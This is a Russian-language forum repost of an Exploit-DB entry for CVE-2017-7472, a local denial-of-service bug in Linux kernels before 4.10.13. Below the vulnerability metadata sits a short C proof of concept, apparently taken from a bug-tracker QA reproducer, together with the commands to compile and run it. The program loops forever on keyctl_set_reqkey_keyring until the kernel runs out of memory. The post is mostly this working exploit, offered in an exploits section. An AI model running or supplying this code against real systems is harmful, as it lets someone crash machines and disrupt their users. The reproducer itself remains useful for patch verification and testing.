Exploit Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
42136
Проверка EDB
  1. Пройдено
Автор
MARCUS MEISSNER
Тип уязвимости
DOS
Платформа
LINUX
CVE
cve-2017-7472
Дата публикации
2017-06-07
Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service
C:
/*
Source: https://bugzilla.novell.com/show_bug.cgi?id=1034862
QA REPRODUCER:

gcc -O2 -o CVE-2017-7472 CVE-2017-7472.c -lkeyutils
./CVE-2017-7472

(will run the kernel out of memory)
*/
#include <sys/types.h>
#include <keyutils.h>

int main()
{
	for (;;)
		keyctl_set_reqkey_keyring(KEY_REQKEY_DEFL_THREAD_KEYRING);
}
 
Источник
www.exploit-db.com

Похожие темы